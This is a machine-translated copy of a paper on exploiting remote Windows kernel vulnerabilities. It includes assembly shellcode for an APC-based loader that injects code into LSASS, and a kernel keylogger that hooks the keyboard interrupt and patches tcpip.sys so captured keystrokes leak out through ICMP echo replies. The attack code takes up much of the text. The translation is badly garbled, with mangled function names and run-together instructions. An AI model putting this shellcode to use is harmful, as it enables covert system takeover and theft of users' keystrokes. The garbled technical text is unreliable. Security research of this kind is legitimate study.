Windows Remote Kernel vulnerability injection of: Barnaby Jack translation: Polaris 2003EMAIL: zhangjingsheng_nbu@yahoo.com.cn Description: The only part of the original translation of all relevant technical data, ignoring a small part of the redundant information. -------------------------------------------------- -------------------------------------------------- - The core area is supported by 4 access rights and the user area I386 system, which is the usual privilege level. Windows NT uses two permissions, making the NT operating system running in systems that do not fully support these four privileged levels. User area code, such as applications, such as applications, and system services running at Level 3, and user-mode processes can only access 2 billion bytes assigned to them, and user code can be switched by paging and context. The core class code is running at level 0, hardware abstraction, IO, memory management, and graphics interfaces are running at level 0. At 0, the code executed, runs all permissions for the system when running, access all memory and can use privileges. Due to design, user mode processes cannot be switched with free permission registration, this feature involves the security model of the overall Windows NT. Of course, this security model is composed of multiple hours. Sometimes the user's job does not have a core level function function that cannot be completed, which is the original origin of the Native API. The Native API is an unnamed internal function set that runs in kernel mode. The Native API exists, is to provide some ways to securely call kernel mode services in user mode. A user application can call the NTIVE API exported by NTDLL.DLL. NTDLL.DLL exports a large number of functions for packaging the corresponding core functions. If you disassemble one of the functions, you will find the results similar to the following: Windows 2000: MOV EAX, 0x0000002FLEA EDX, [ESP 04] INT 0X2E Each NTDLL exported Native API can be confined into the execution environment Switch to the code segment of the kernel mode. First, the register loads an index value to the system service table, then the function required to access the offset location in NTOSKRNL. Windows XP: MOV Eax, 0x0000002FMOV EDX, 7FFE0300Call Edxat Offset 0x7ffe0300: Mov Edx, Espsysenterret If your configuration is Pentium II or higher, the situation will be somewhat different in Windows XP. Windows XP is a switching of kernel mode with user mode through the Sysenter / Sysexit directive pair, which adds some difficulties to create shell code, and explain it later. In order to successfully create a shell code of the kernel mode, you must forget all user-level APIs and use only the kernel-level function Native API. More documentation on the Native API can refer to Gary Nebbett's "The Windows NT / 2000 Native API Referce". The nature of the blue screen When you find a vulnerability, you face a blue screen when you send packets to a remote system. To successfully inject a kernel-level vulnerability, first understand the principle of "Blue Screen of Dear".
When you see BSOD, this means that the Native function KebugCheckex is called, there are two cases to raise this error: 1, by the kernel exception call 2, the exception chain process mechanism to call the kebugCheckex kernel directly by the error detection mechanism is as follows: When an exception is generated, the kernel obtains control through the Idt (interrupt descriptor table) function entry (Kitrapxx). These functions form a Level 1 trap handler, which may handle this exception alone, or pass the exception to the next anomaly, or if this exception cannot be processed, then Turn directly to KebugCheckex. No matter which case, in order to master the cause and place of abnormalities, we need a trap frame. Trap is a structure similar to context, using this structure, can get the status of all registers and an abnormal address pointed to by the instruction register. I tend to use the Compuware / Numega's Softice debugger to do all work, but when the trap is, WindBG provides better structural recognition capabilities. If you only use Softice, I must manually locate the previous stack parameters. If your computer sets the memory dump function when a blue screen is set, the default storage path of this file is% systemroot% / memory.dmp. Load Windbg and select "Open Crash Dump" loads the saved file. The following is an example of KebugChecKex directly calling the trap handler. After loading the memory dump file, Windbg is as follows:
Windbg shows that KebugCheckex is called by Delicate Procedure Kitrapoe and and the address of the trap is 0x8054199c. Now use the "Trap Address" command to display the contents of the trap. Now we can see the state of all registers when the abnormality is thrown, and a part of the memory area can be displayed. Seeing the value of the instruction register is 0x41414141, indicating that it is in the user area. Now we can change the execution process in accordance with your own will. In this case, the data is positioned by the ESP register: Now we can use JMP ESP, CALL ESP, PUSH ESP / RET and other offset values to implement the execution process redirect, and any standard overflow technology can be used. Vulnerability overflow. If KebugCheckex is triggered by an exception handling mechanism, the trap is passed as a third parameter to KidispatChexception. In this case, you need to pass the address of the third parameter to the dead command. When the process redirects the offset address, the offset address must be a static memory address (that is, the address in the memory is unchanged). SHELL CODE Example The first shell code example is "Kernel Loader", which allows for any user area code and is safely executed, which is very convenient to perform remote shell code and any user-level shell code. The second example is pure kernel. This example creates a user keyboard interrupt handler to capture all keyboard input messages. Then use the shell code tcpip.sys ICMP handler to return the keyboard buffer to the remote system via the ICMP ECHO request. This code is small and uses few very little API functions. In order to fully understand the following example, I copied the corresponding source code. The "kernel loader" has many technologies to convert the code from the kernel state to the user status and execute, you can change the EIP of the thread being executed, let it point to your code - if this technology is used, running The process will be self-destroy. You can use the RTLCREATEUSERTHREAD and RTLCREATEUSERTHREAD and RTLCREATEUSERPROCESS functions in ntoskrnl, which creates SMSS.exe (unique processes without parent processes, creating them directly by kernel). However, there are two questions here: first, they are not exporting functions; second, it is a bigger problem, they are in the ntoskrnl init zone, which means that the two functions have been executed before the process is executed. Therefore, it is necessary to re-map NTOSKRNL, and initialize some global variables (_mmhighestuseraddress and _ntglobalflag), of course, the first address of the function is also required. Another possible method is to create a remote thread in a user domain process and execute the thread directly. Firew0RKer talked about these: http://www.phrack.org/phrack/62/p62-0x06_kernel_mode_backdoors_for_windows_nt.txt unfortunately, this method also has a defect. When executing user-level code, the API function CreateProcess may fail because the CSRSS subsystem must be notified. You need to re-get Workaround and create a new Context structure in the user-level Shell Code. In order to keep the shell code as small as possible, the above-mentioned Workaround is not a viable selection in order to be able to insert an arbitrary user domain code. Because this method also uses NTDLL's export functions, a certain issue is triggered in systems other than Windows 2000.
Windows 2000 uses OX2E interrupt to implement level 3 to level level 0, whether it can be implemented in a level 3 or level 0. However, the problem under Windows XP is generated, and Windows XP is the switch between level 0 and 3. If the DTDLL export function is called directly in the kernel, it means that the blue screen is coming. In order to solve this problem, the additional code used to query the ntoskrnl function in the system service table is necessary. I decided to execute the user domain shell code mode by using asynchronous procedure calls. This method is only used directly from NtoskRNL. The function. In a user thread in a "Alertable Wait State", the function must be performed immediately. Threads in "Alarm Wait Status" may be due to the calls such as Sleepex, WaitForsingleObjectEx, SignalObjectandWait, and MsgWaitFormultiPleObjectsex set the alertableflag to True. The number of API calls required for this method is the least, and relatively reliable. All functions we will use are exported by nooskrnl. The first step is to manually obtain NtoskRNL base sites. In order to complete this step, we use technology known as "mid-delta": first get a pointer to the NTOSKRNL address space, and then reactive to the pointer to executive File flag "MZ". To get a pointer to the NTOSKRNL address space, we can first get the first entry address of the interrupt descriptor table (IDT), because this address is to point to a location in the NTOSKRNL address space. The next code is to access a memory pointer in the IDT and then find the base address by decrementing the pointer. MOV ESI, DWORD PTR DS: [0FFDFF038H]; get the IDT address LodsdcdqlodSd; Get Pointer INTO NTOSKRNL @ base_loop: DECMP DWORD PTR [EAX], 00905A4DH; Detect "MZ" flag JNZ @BASE_LOOP gets the general method of the IDT base address is to use SIDT instruction. Since IDT is pointed to by the 0xFFDFF038 address, I can directly access the IDT address, which can also reduce some bytes. Maybe you will notice the above code does not get the correct IDT entry address, we just get the high character part of the entrance address, because the illegal part of the area is in 0-0xffffff, ignored, still in the NTOSKRNL memory address In space.
hash_table: dw 063dfh; "PsLookupProcessByProcessId" _pslookupprocessbyprocessid equ [ebx] dw 0df10h; "KeDelayExecutionThread" _kedelayexecutionthread equ [ebx 4] dw 0f807h; "ExAllocatePool" _exallocatepool equ [ebx 8] dw 057d2h; "ZwYieldExecution" _keyieldexecution equ [ebx 12] DW 07B23H; "KeinitializeApc" _keinitializeAPC EQU [EBX 16] DW 09DD1H; "KeinsertQueueAPC" _keinsertQueueAPC EQU [EBX 20] Hash_Table_end: Next We can create a hash table, each required function is in it Having a word header. The function name string often occupies a large amount of space in Win32 Shell Code, so use hash mechanisms more reasonable. The pointers per function are stored in a group and can be accessed by the shell code via the EBX register. Next, the standard "getProcadDress" is performed, which analyzes the derived table of NToskRNL and obtains the entry address of the corresponding function. The hash table here is a bit special, but the XOR / ROR operation is performed on each byte of the export function name. I use the word length hash table instead of the double word long Has Xi Table is to minimize the length of shell code. Once all the entrance addresses that will be used, the next task is to assign a new memory block to store Shell Code. Because the code has resides on the stack, you must copy the code to a new memory block. Otherwise the next kernel function covers the large block area, especially when we request to reduce the IRQL (Interrupt Request Level). We pass the nonPAGEDPOOL to ExallocatePool, then copy the shell code to the Non-Paged area, and then perform a JMP instruction to come to this memory area. Now all code can be implemented safely without being affected. When the driver is injected, we must realize the current IRQL. IRQL is a designated kernel program current hardware priority, many kernel programs to request the IRQL passive (0) in order to successfully execute. If you run in the Dispatch (2) level (for program scheduling and delay process call), you must drop the IRQL to passive. This is just a simple thing, just call the HAL's export function KelowerIRIRIRIRIRIRIRIRIRIRQL and put 0 (Passive) as parameter. Now we need to bind the user domain code to the process, you must first get the pointer to the EPROCESS structure, each process has a corresponding EPROCESS structure. More information about this article All structures can be obtained by DUMP structures (for example: DT NT! _Eprocess) in Windbg. The function we will use requires EPRocess's offset address, and if you can get pointers to all EPROCESS structures, you can get all the current activity processes by traversing all structures. In general, the first EPROCESS structure can be obtained by calling psgetcurrentprocess.
Unfortunately, when it is injected into a remote driver, we may inject a "wait" state, this "Waiting" does not return a valid process control block. I replace it with PslookupProcessByProcessID and put the PID of the "System" process as a parameter. This value is 4 in Windows XP, and this value is 8 in Windows 2000. Lea EBP, [EDI-4] Push Ebppush 04Call DWORD PTR _PSLOOKUPPROCESSBYPROCESSID; acquisition system EPROCESSMOV EAX, [EBP]; get the system EPROCESS pointer to get the first EPRocess structure, now we can access all current activities process. Although I chose to inject the code into the LSAASS address space, all the running system processes are appropriate targets. In order to access the LSASS, the loop mode enumerates each entry address pointed to the EPRocess ActiveProcessLinks and compared to the LSASS module name. mov cl, EP_ActiveProcessLinks; offset to ActiveProcessLinksadd eax, ecx; get address of EPROCESS ActiveProcessLinks @ eproc_loop: mov eax, [eax]; get next EPROCESS structmov cl, EP_ModuleNamecmp dword ptr [eax ecx], "sasl"; is it LSASS ? JNZ @EProc_loop Once the LSASS process is locked, you can get the offset value of LSASS and the first EPROCESS structure by subtracting the ActiveProcessLinks offset. The next step is to copy Shell Code to the target memory space. At first I intend to store the code in PEB; before, PEB is always mapped to 0x7ffdf000, but the mapping address of the PEB in XP SP2 is random. Although PEB can be found via 0xffdff000-> 0x18-> 0x30, we have a better choice: store the code to the kernel - the user-shared memory area, usually called SharedUserData. 0xffdf0000 is a writable memory area where we can save our code. This memory area is mapped from the user domain to read-only 0x7ffe0000, this mapping is the same on all platforms, so this is a good choice. Since memory is readable in this area, it is readable to all processes, so it is necessary to switch address space to the target process, and can write directly from the kernel to 0xFFDF0000 0x800. When queued a user mode APC, 0x7ffe0000 0x800 is used as a parameter. call @ get_eip2 @ get_eip2: pop esimov cx, shell code - $ 1add esi, ecx; Get shell code addressmov cx, (shell code_end-shell code); Shell code sizemov dword ptr [edi], SMEM_ADDR; 0xFFDF0000 0x800push edimov edi , [EDI]; Copy Shell Code to SharedUserDataRep MovsBPOP EDI now needs to find a thread that can perform APC functions. The APC can be a kernel mode APC or a user mode APC, which queues a user mode APC. If we will pass the thread is not in the "Alarm Waiting Status", the user mode APC will not be called.
I have already mentioned earlier, a thread can enter the Balertable to True by calling Sleepex, SignalObjectSex and WaitFORMULTIPLEOBJECTSEX AND WAITFORSINGLEOBJECTEX and WaitForsingleObjectEx. You can enter this state. To find an available thread, you need to access the ETHREAD pointer of the process and traverse each thread until you find the thread we need. mov edx, [edi 16]; Pointer to EPROCESSmov ecx, [edx ET_ThreadListHead]; Get ETHREAD pointer @ find_delay: mov ecx, [ecx]; Get next threadcmp byte ptr [ecx-ET_ThreadState], 04h; Thread in DelayExecution? The code above JNZ @Find_delay first acquires the pointer of the LSASS Ethread structure through the THREADLISTHEAD LIST_ENTRY of the EPROCESS structure, and then detects the thread status flag. Once the target thread is found, we set the eBP to point to the KTREAD structure, then we want to initially the APC program. xor edx, edxpush edxpush 01; push processorpush dword ptr [edi]; push EIP of shell code (0x7ffe0000 0x800) push edx; push NULLpush offset KROUTINE; push KERNEL routinepush edx; push NULLpush ebp; push KTHREADpush esi; push APC objectcall dword PTR _keinitializeApc; Initialize APC We put the user mode Shell Code EIP as the parameters of KeinitializeAPC, and must pass a kernel program that will be called. We don't need this program to do anything, just point the return command to the shell code, the KThread structure of the thread is necessary for performing our APC program, the APC object will return by the ESI register in the form of a pointer variable. Now you can insert our APC program into the APC queue of the target thread. Push Eax; Push 0PUSH DWORD PTR [EDI 4]; System Argpush DWORD PTR [EDI 8]; System Argpush ESI; APC ObjectCall DWORD PTR _keInsertqueueAPC Last function is KeinsertQueueAPC to send APC. In the above code, EAX is 0, and the two system parameters also point to the pointer to the empty address, of course, also passed the APC object returned by KeinitializeAPC. Finally, in order to prevent our just initialized load threads and blue screens, pass 0x80000000: 00000000 to KeDelayExecutionthread, let thread sleep. Push Offset Large_INTPUSH Falsepush KernelModecall DWORD PTR _KEDELAYEXECUTIONTHREAD If we entered the "iDLE" address space in accidents, then this call will fail.
The way to solve this problem is to give up the implementation of the city, then continue to cycle. The code snippet is as follows: @Yield_loop: Call dword PTR_KeyieldExecutionjmp @Yield_LoOp Wanling, the user mode thread should be safely executed in the SYSTEM process you have selected. If you complete the APC function, call ExitThread to exit the user code, the system is likely to be stable. The ICMP Patching Interrupt Hooking Key-Logger When I chat with Derek Soeder from Eeye, we discussed which is a useful shell code that is completely consisting of internal code. One of the ideas is that the kernel level Key-Logger, which can return to the keyboard buffer to the remote thread. Obviously, this is a shell code, creating a complete keyboard filter and communication pipeline may be greatly exceeded by acceptable code length, so shortcut is required. We use technologies derived from the DOS era, replace the keyboard interrupt handler entry to capture the scan code instead of binding the keyboard filter to capture the keyboard message. I decided to modify the ICMP processing body of the TCPIP.sys driver, not by creating a pipeline back to the remote user. The patch has modified the ICMP ECHO processing, replacing the original buffer with our own keyboard buffer. Send an ICMP Echo request to the remote system will return the captured button. The first step is to replace the IDT entry of the keyboard processing to interrupt the handle of the processing body. Now, Windows XP and 2000 SP4 have an IRQ interrupt vector table stored in the HAL memory area. We can easily search for the adjacent logo bytes, and query the interrupt vector corresponding to the IRQ1 (keyboard IRQ). In the early service pack, such as Window 2000 SP0, this table does not exist, however the interrupt vector table is stationary, RQ1 = Vector 0x31, IRQ2 = Vector 0x32, etc. The following code first attempts to locate the vector table. If the positioning failed, the interrupt vector 0x31 is used directly.
mov esi, dword ptr ds: [0ffdff038h]; IDT base address acquired lodsdcdqlodsd; NTOSKRNL acquired address space pointer @base_loop: dec eaxcmp dword ptr [eax], 00905a4dh; MZ detection flag jnz @base_loopjecxz @hal_base; save base address NTOSKRNL To Eaxxchg EDX, Eaxmov Eax, [EDX 590H], get a pointer of a HAL function XOR ECX, ECXJMP @Base_Loop; looking for the HAL's base address @hal_base: MOV EDI, ED; save the HAL's base address to Edimov EBP, EDX The NToskRNL base address is stored to EbpCldmov EAX, 41413D00H; flag byte "= aa / 0" xor ECX, ECXDEC CXSHR ECX, 4REPNZ scaSd; EcXjz @no_tablelelea EDI, ECXJZ @no_tablelela edi, [EDI "in the IDT table 01ch]; Make the pointer of the phase Push EDIINC ED; IRQ 1REPNZ ScaSBPOP ESISUB EDI, ESIDEC EDI; get the keyboard interrupt JMP @ Table_ok @ no_table: MOV EDI, 031H; If the phase quantity does not exist, use the static value @Table_ok: Push EdxSIDT [ESP-2]; GET IDTPOP EDXLEA ESI, [EDX EDI * 8 4]; IDT middle keyboard processing body entry stdlodsdlodsw; Eax is the keyboard processing body entry address MOV DWORD PTR [HANDLER_OLD], EAX; Save the base address of Nosokrnl and Hal.dll first, then search "= aa / 0" flag in the HAL address space, this double word flag identifies TRQL from the interrupt meter The start of the TPR conversion table. If you find this identity, we set the interrupt vector to 0x31; if you do not find the IRQ table, the offset value required is at the 0xC1H of the IRQ table. Then we locate the vector corresponding to the keyboard IRQ1, then use the SIDT instruction to get the base address of the IDT. The formula of the interrupt vector IDT entry is as follows: IDT_BASE INT_VECTOR * 8 acquires the address of the original interrupt processing from the IDT, saved in the starting position of our handler, and thus returns to the original processing when our handlers complete the specific function program.
The following code replaces the original handler entry with our custom interrupt processing body in the IDT: CLDMOV Eax, @handler_newcli; mask interrupt MOV [ESI 2], AX; change to new entry addresses when rewriting the entrance address Rewind IDT Extuncture SHR EAX, 16MOV [ESI 8], AxSti; Restore Allow Interrupt Signals Next to call ExallocatePool, assign a buffer for storing the captured keyboard input; we also need to locate TCPIP by analyzing Ntoskrnl. SYS's base address, unfortunately PSLoadedModuleList is not a public export function, so we need manual positioning. The MmgetsystemRoutineaddress function exported by ntoskrnl uses this list. In order to obtain the required pointer, we use the address of the MmgetsystemRoutineAddress as a parameter and manually locate the PslineDModuleList by incrementing the address. mov edi, _mmgetsystemroutineaddress @ mmgsra_scan: inc edimov eax, [edi] sub eax, ebptest eax, 0FFE00003hjnz @mmgsra_scanmov ebx, [edi] cmp ebx, [edi 5]; PsLoadedModuleList pointer detection je @pslml_loopcmp ebx, [edi 6 ] jne @ mmgsra_scan @ pslml_loop:;? find _PsLoadedModuleListmov ebx, [ebx] mov esi, [ebx 30h] mov edx, 50435449h; "ITCP", to determine whether TCPIP.SYS module push 4pop ecx @ pslml_name_loop: lodswror edx, 8sub al , dlje @pslml_name_loop_contcmp al, 20h @ pslml_name_loop_cont: loopz @ pslml_name_loop @ pslml_loop_cont: jnz @pslml_loopmov edi, [ebx 18h]; TCPIP.SYS module above the base address code first traversal MmGetSystemRoutineAddress program to search the linked list pointer. System module list is structured as follows: 00h LIST_ENTRY 08h ??? 18h LPVOID module base address 1Ch LPVOID ptr to entry point function 20h DWORD size of image in bytes 24h UNICODE_STRING full path and file name of module 2Ch UNICODE_STRING module File name only ... Next is to analyze the linked list to get the base address of the TCPIP.sys module. These codes are more similar to software cracks than network shell codes because we will modify TCPIP drivers, which means we can accept keyboard input from remote systems. There are many ways to make it as a communication channel by modifying the ICMP ECHO handler.
We will use Shell Code in Sendecho in TCPIP.SYS. Since the complete disassembly code is too long, the following is the code snippet of the relevant part: From the above disassembly code, [EDX 8] is a pointer to the ICMP ECHO buffer, then modify the above code [EDX 8] The pointer is changed to our keyboard buffer, which is just a very easy thing. MOV EAX, 428BE85DH; TCPIP.SYS address space in byte sequence @find_patch: Inc EdiCMP DWORD PTR [EDI], EAXJNZ @Find_patchadd EDI, 5MOV Al, 68HSTOSB; Store "Push" MOV EAX, EDX; EDX point to keyboard buffer STOSD; Save Keyboard Buffer Pointer MOV EAX, 08428F90H; "POP [EDX 08H] / NOP" Stosd Use the following code can be modified: Push KeyBuffer_offSetPop [EDX 8] NOP When ICMP Echo request is sent to a remote system, feedback The data package will include the captured keyboard input, which is easy to replace the interrupt processing body - when our programs are called, then read the keyboard to scan code from the keyboard fracture and save it to the button buffer . @Handler_new: Push 0Deadbeefh; Save the current handler pointer handler_old equ $ -4pushfdpushadxor EAX, EAXLEA EDI, Keybuf; rewrite KB_PATCH EQU $ -4In Al, 60H with allocated buffer addresses; get keyboard scanning code Test Al, Al; no Scanning code? JZ @donepush Edimov ECX, [EDI] Lea EDI, [EDI ECX 4] Stosb; Store Code In Bufferinc ECXPOP Edicmp CX, 1023JNZ @donExor ECX, ECX @ DONE: MOV [EDI], ECXPOPADPOPFDDB 0C3H; return Once the original handler is generated, the above code will be called, and the initial interrupt handler handle (has been rewritten) is pressed into the stack. Read the current scan code from the 0x60 fracture and saved to the assigned buffer. This buffer can save the 0x3FF keyboard input, if there is a scan code, it will overwrite the front portion. Thoughts on the Injection of the Firewall Driver When injecting a kernel-level vulnerability in a firewall driver, many problems will need to consider. The vulnerability we want to demonstrate is caused by the process of processing the DNS feedback information, and the DNS feedback information is processed by Symdns.sys. If the DNS process cannot be successfully returned, then you cannot communicate with socket. Before studying this problem, you must first understand the communication mechanism of multiple protocol layers. Below is an outline of the network layer: 1). Network Driver Interface Specification Layer NDIS provides a passage NDIS driver directly to the network adapter from the physical device to network transmission.